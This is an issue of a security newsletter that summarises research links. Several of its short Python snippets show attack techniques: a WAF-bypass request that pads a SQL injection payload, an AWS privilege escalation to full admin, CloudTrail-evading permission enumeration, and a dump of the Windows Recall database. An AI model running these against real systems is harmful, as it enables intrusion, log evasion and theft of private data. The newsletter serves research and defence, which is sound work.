
[tl;dr sec] #234 - Awesome CI/CD Attacks, STRIDE GPT, Non Production AWS Attack Surface

Practical resources for offensive CI/CD research, AI threat modeling tool, bypassing CloudTrail through non-prod endpoints

Hey there,

I hope you’ve been doing well!

If you’ve been reading tl;dr sec for a bit, it’s likely no surprise to you, dear reader, that I love secure defaults / guardrails / “paved roads.”

That is, eliminating classes of vulnerabilities by construction (vs playing bug whack-a-mole later).

Though it takes upfront work and there are both technical and inter-organizational challenges to making it work in the Real World™️, it can be one of the highest leverage things security teams can do.

Rami McCarthy has written an excellent post covering:

  • What are “secure defaults” and who’s been talking about it? (CISA, Meta, Google, Netflix, and others)

  • Characteristics of secure defaults

  • Examples across AppSec, infrastructure, and endpoint security

  • Who is selling secure defaults

  • Challenges in selling secure defaults

  • and more

As with any of Rami’s posts, it comes with oodles of great supporting links if you want to go deeper.

You can 👉️ read it here 👈️.

(Pretend I also wrote a both funny and heart-warming intro before this. It’s late and I ran out of time 😅 )

Sponsor

📣 Navigating the NIST AI Framework

Last year, the National Institute of Standards and Technology (NIST) released the new NIST AI Risk Management Framework (RMF) with the goal of helping organizations manage AI risk.

In this ultimate guide, explore why AI risk matters, uncover the key challenges you’ll run into when managing AI risk, and dive deep into the NIST AI RMF. You’ll walk away with everything you need to know to get started with the framework!

Colleagues yolo-shipping AI features? It’s useful to hear perspective from thoughtful groups like NIST on managing AI risk 👍️ 

AppSec

assetnote/nowafpls
A Burp plugin by Shubham Shah that bypasses Web Application Firewalls (WAFs) by inserting junk data into HTTP requests, exploiting the fact that most WAFs only inspect a limited amount of the request body. See also Shubs’ NahamCon 2024 talk Modern WAF Bypass Techniques on Large Attack Surfaces.
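
To make the padding idea concrete, here’s a minimal sketch (not the plugin itself; the target URL, field names, payload, and padding size are all illustrative assumptions):

```python
import requests

# Many WAFs only inspect the first N KB of a request body, so prepending a
# large junk field can push the interesting part of the payload past the
# inspection limit. Everything below (URL, field names, 128 KB of filler,
# the payload itself) is a made-up example, not nowafpls' implementation.
junk = {"padding": "A" * (128 * 1024)}      # filler the WAF has to wade through first
payload = {"comment": "' OR 1=1 --"}        # what you actually want to slip past inspection

resp = requests.post(
    "https://target.example/api/comments",  # placeholder target
    json={**junk, **payload},
    timeout=10,
)
print(resp.status_code, len(resp.text))
```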

Netflix’s Journey to One Million in Bug Bounty and Beyond
Lakshmi Sudheer shares that Netflix’s bug bounty program has now paid out over $1M since its launch in 2016: 5,360 unique researchers have submitted 7,971 non-duplicate reports, with 845 valid vulnerabilities rewarded, 26% of which were Critical or High severity.

Hacking Millions of Modems (and Investigating Who Hacked My Modem)
Sam Curry discovered that his modem had likely been hacked when he noticed an unknown IP address intercepting and replaying his HTTP traffic.

The bulk of the post is a detailed walkthrough of how he later found a series of vulnerabilities in the Cox Business portal that would have allowed a fully external attacker with no prerequisites to execute commands and modify the settings of millions of modems, access any business customer's PII, and gain essentially the same permissions as an ISP support team.

💡 Great black box testing methodology example: determining the tech stack, finding Swagger docs to understand attack surface and available functionality, finding an auth bypass, chaining steps together, etc. Very fun read.

Sponsor

⚡️Mitigate CI/CD Risks ⚡️

Want to bolster your CI/CD pipeline?

This new cheat sheet covers best practices with actionable items in Infrastructure security, code security, secrets management, access and authentication, and monitoring and response.

As links in nigh every tl;dr sec show, there are a lot of ways CI/CD security can go wrong 😅 Nice to have a handy cheat sheet with actionable tips.

Cloud Security

AWS IAM Privilege Escalation Techniques
Hacking The Cloud page by Nick Frichette covering >35 different techniques.
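
To make one of those concrete, here’s a rough sketch of the well-known iam:CreatePolicyVersion escalation; the policy ARN is a placeholder for a customer-managed policy the compromised principal is both attached to and allowed to modify:

```python
import json
import boto3

# Sketch of the iam:CreatePolicyVersion escalation: a principal allowed to
# create a new *default* version of a policy attached to itself can rewrite
# that policy to grant full admin. The ARN below is a placeholder.
iam = boto3.client("iam")

admin_policy = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

iam.create_policy_version(
    PolicyArn="arn:aws:iam::123456789012:policy/example-app-policy",  # placeholder
    PolicyDocument=json.dumps(admin_policy),
    SetAsDefault=True,  # the new version takes effect immediately
)
```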

Things you wish you didn't need to know about S3
Plerion’s Daniel Grzelak takes us on a journey through S3 oddities, including: S3 buckets are the S3 API, ListObjects is not the only way to get object keys, multipart upload listings leak principal ARNs, access control lists can grant access based on email, S3 will tell you the bucket owner if you ask nicely, and more. Also, what appear to be really locked down S3 buckets can still be public via CloudFront or Cognito.

Choice quotes: “In recent years, AWS has done a stellar job confiscating foot guns they previously distributed.” “There are some people in this world who enjoy crimes.”
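
As a taste of the multipart upload oddity, here’s a minimal boto3 sketch (the bucket name is a placeholder, and only poke at buckets you’re authorized to test):

```python
import boto3

# If a bucket lets you list in-progress multipart uploads, each entry includes
# an Initiator, whose ID is typically the uploading principal's ARN, i.e. the
# listing can leak internal role/user names. Bucket name is a placeholder.
s3 = boto3.client("s3")
resp = s3.list_multipart_uploads(Bucket="some-bucket")

for upload in resp.get("Uploads", []):
    print(upload["Key"], upload["Initiator"])
```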

Non-Production Endpoints as an Attack Surface in AWS
Datadog’s Nick Frichette describes how he identified two new archetypes for bypassing AWS CloudTrail: through certain non-production endpoints with API actions that access account-level information, and through API calls that generate multiple events in CloudTrail. Being able to enumerate permissions without logging to CloudTrail allows attackers to stealthily assess the privileges of compromised credentials.

💡 This post is a great example of black box testing complex systems and looking for behavior edge cases. Also how to find non-production endpoints at scale (certificate transparency + automation).
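
If you want to experiment with the general pattern, here’s a rough sketch (not Datadog’s exact method; the hostname is a made-up placeholder, not a real non-production endpoint):

```python
import boto3
from botocore.exceptions import ClientError

# The general enumeration idea: SDK clients can be pointed at an arbitrary
# endpoint via endpoint_url. An API call sent to a non-production endpoint that
# doesn't log to CloudTrail still reveals, via success vs. AccessDenied, whether
# the credentials hold that permission. The hostname below is a fake placeholder.
ec2 = boto3.client(
    "ec2",
    region_name="us-east-1",
    endpoint_url="https://ec2-nonprod.example.amazonaws.com",  # hypothetical
)

try:
    ec2.describe_instances(MaxResults=5)
    print("Credentials can call ec2:DescribeInstances")
except ClientError as e:
    print("Denied or unsupported:", e.response["Error"]["Code"])
```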

Credentials Leaking with Subdomain Takeover
Neat post by Truffle’s Joe Leon on an issue identified on the documentation platform ReadMe. Basically:

  1. If a site allows you to set a subdomain for your org (e.g. ORG_NAME.readme.io) and stores sensitive info (like API keys) in localStorage of user browsers, then-

  2. If a company stops using that service but doesn’t remove the CNAME, you have a classic subdomain takeover.

  3. But in this case, when a victim visits your now-malicious site, because it’s on the same (sub)domain as before, your JavaScript can extract the secret(s) from the browser’s localStorage.

💡 It’s not uncommon for sites to let you set org-specific custom subdomains like this, so I bet you can find other services with the same issue.

Also, initially ReadMe wasn’t going to fix this, so Truffle proactively squatted the domains for all impacted orgs and emailed them with detailed remediation instructions. This is A+ being a good Internet citizen, nice work 🤘 

Supply Chain

NIST expects to clear backlog in vulnerabilities database by end of fiscal year
They’ve awarded a new contract to an outside vendor to help. TIL the NVD staff is 21 people and had a 12% drop in funding for this fiscal year.

TupleType/awesome-cicd-attacks
By Asi Greenholts: Practical resources for offensive CI/CD security research across techniques (publicly exposed sensitive data, initial code execution, post exploitation, defense evasion), offensive tools, case studies, and similar projects. Many of the resources have previously been called out in tl;dr sec 😎 

Working as unexpected
Chainguard’s Matt Moore shares a tale of a “working as intended” branch protection bypass (when using wildcard branch protection rules) that allows for protected credential exfiltration. Best practices for branch protections (more in the post):

  • Favor the use of repository rulesets (new) over branch protections (old), which can actually block administrators if they are not explicitly put onto the bypass list. 

  • Only use wildcards in branch protections when absolutely necessary.

  • When using wildcard branch protections always restrict who can create matching branches (e.g. so that only admins can create release branches).

Blue Team

Rolling your own Detections as Code with Elastic Security
Elastic’s Mika Ayenson, Kseniia Ignatovych, and Justin Ibarra give a nice overview of Detections as Code and how they’re aiming to make managing your own custom Elastic rules easier.

The detection-rules repo is now easier to use for custom rules management (minimize merge conflicts), you can configure which of the Elastic-provided unit tests should run on custom rules and which should be skipped, and you can manage rule settings like exceptions and actions alongside detections.

Tactical Guide to Threat Hunting in Snowflake Environments
Mitiga’s Doron Karmi, Or Aspir, and Roei Sherman describe how a threat actor has been using stolen customer credentials to target organizations using Snowflake databases and extorting them. They detail how to use the QUERY_HISTORY and LOGIN_HISTORY logs to effectively identify and investigate suspicious behavior within your Snowflake environment, providing example queries, hardening settings, and mitigation advice (our dear friends SSO & 2FA).
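
As a starting point in that spirit (a minimal sketch, not Mitiga’s exact queries), here’s how you might pull recent password-only logins from ACCOUNT_USAGE, the kind of sign-in you’d expect stolen credentials to produce; connection parameters are placeholders:

```python
import snowflake.connector

# Connection parameters are placeholders; use whatever auth your org requires.
conn = snowflake.connector.connect(
    account="my_org-my_account",
    user="SECURITY_READER",
    authenticator="externalbrowser",
)

# Recent logins that used only a password (no SSO/MFA) are a useful hunting
# starting point for the credential-theft campaign described above.
query = """
SELECT event_timestamp, user_name, client_ip, reported_client_type, is_success
FROM snowflake.account_usage.login_history
WHERE event_timestamp > DATEADD('day', -7, CURRENT_TIMESTAMP())
  AND first_authentication_factor = 'PASSWORD'
ORDER BY event_timestamp DESC;
"""

for row in conn.cursor().execute(query):
    print(row)
```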

Red Team

SafeBreach-Labs/DoubleDrive
By SafeBreach’s Or Yair: A ransomware PoC that utilizes cloud drive services (OneDrive, Google Drive) to encrypt target files. Presented at Black Hat USA 2023 Briefing.

Introducing BadDNS
Black Lantern Security’s Paul Mueller announces the release of BadDNS, a new Python DNS auditing tool designed for subdomain takeover detection, zone transfers, and NSEC walking, with unique features like checking HTML for links or other references that contain a hijackable domain, as well as checking TXT records.

AI + Security

Disrupting deceptive uses of AI by covert influence operations
OpenAI has terminated accounts used by Russia, China, Iran, and a commercial company in Israel that were using OpenAI models for influence operations, largely assisting in text generation (e.g. social media or blog posts that sound more fluent) or writing or debugging code. “No significant audience increase due to our services.”

Mapping the Mind of a Large Language Model
Anthropic has used dictionary learning to map the internal workings of Claude Sonnet, identifying millions of features that represent a wide range of concepts (e.g. cities like San Francisco or abstract concepts like conversations about keeping secrets). This breakthrough provides a detailed look into the model's internal states, offering insights into how AI models process information and paving the way for safer and more reliable AI systems. Very cool work, enjoyed the diagrams.

See also Golden Gate Claude, a version of Claude tuned to be obsessed with the Golden Gate Bridge.

STRIDE GPT v0.8
The latest version of Matthew Adams’ AI-powered threat modeling tool (GitHub) that leverages OpenAI's GPT models to generate threat models for a given application based on the STRIDE methodology. This version adds DREAD risk scoring and automatic generation of Gherkin test cases based on identified threats.

Stealing everything you’ve ever typed or viewed on your own Windows PC is now possible with two lines of code — inside the Copilot+ Recall disaster.
Excellent breakdown and FAQ by Kevin Beaumont on Windows’ new “Recall” feature. How it works: “Every few seconds, screenshots are taken. These are automatically OCR’d by Azure AI, running on your device, and written into an SQLite database in the user’s folder. This database file has a record of everything you’ve ever viewed on your PC in plain text.”

So if you get compromised by malware, it can trivially steal, in a generic and quick way, basically anything you’ve ever looked at: banking info, healthcare info, private texts, emails, or other messages, etc.

xaitax/TotalRecall
Tool by Alexander Hagenah that extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots.
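
If you’re curious what’s actually in there, a minimal sketch along the lines of what such tools do is simply opening the database with sqlite3 and dumping it; the path below is the commonly reported location in preview builds (the GUID segment varies per machine) and may well change:

```python
import sqlite3

# Path is a placeholder based on the commonly reported Recall location in
# preview builds; the GUID directory differs per machine and may change.
db_path = r"C:\Users\you\AppData\Local\CoreAIPlatform.00\UKP\{GUID}\ukg.db"

conn = sqlite3.connect(db_path)

# Enumerate tables rather than assuming their names, then peek at a few rows.
tables = [row[0] for row in
          conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
print("Tables:", tables)

for table in tables:
    print(f"--- {table} ---")
    for row in conn.execute(f'SELECT * FROM "{table}" LIMIT 3'):
        print(row)
```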

AI

How Anthropic Designed Itself to Avoid OpenAI’s Mistakes
“Unlike OpenAI, which essentially operates as a capped-profit company governed by a nonprofit board that is not accountable to the company’s shareholders, Anthropic is a public benefit corporation (PBC), which means that as well as having a fiduciary obligation to increase profits for shareholders, its board also has legal room to follow a separate mission: to ensure that ‘transformative AI helps people and society flourish.’”

“What that essentially means is that shareholders would find it more difficult to sue Anthropic’s board if the board chose to prioritize safety over increasing profits.”

Financial Statement Analysis with Large Language Models
“We investigate whether an LLM can successfully perform financial statement analysis in a way similar to a professional human analyst. We provide standardized and anonymous financial statements to GPT4 and instruct the model to analyze them to determine the direction of future earnings. Even without any narrative or industry-specific information, the LLM outperforms financial analysts in its ability to predict earnings change.”

“LLM prediction does not stem from its training memory. Instead, we find that the LLM generates useful narrative insights about a company's future performance. Lastly, our trading strategies based on GPT's predictions yield a higher Sharpe ratio and alphas than strategies based on other models. Taken together, our results suggest that LLMs may take a central role in decision-making.”

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate it if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler